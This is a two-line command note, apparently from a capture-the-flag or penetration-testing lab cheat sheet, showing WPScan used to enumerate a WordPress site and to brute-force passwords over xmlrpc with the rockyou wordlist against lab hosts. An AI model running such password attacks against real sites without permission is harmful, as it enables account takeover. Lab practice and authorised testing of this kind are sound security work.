WPScan

wpscan -o wpscan.out -e --url http://blog.thm/
wpscan -U users.lst -P /opt/rockyou.txt --password-attack xmlrpc --url http://blog.htb/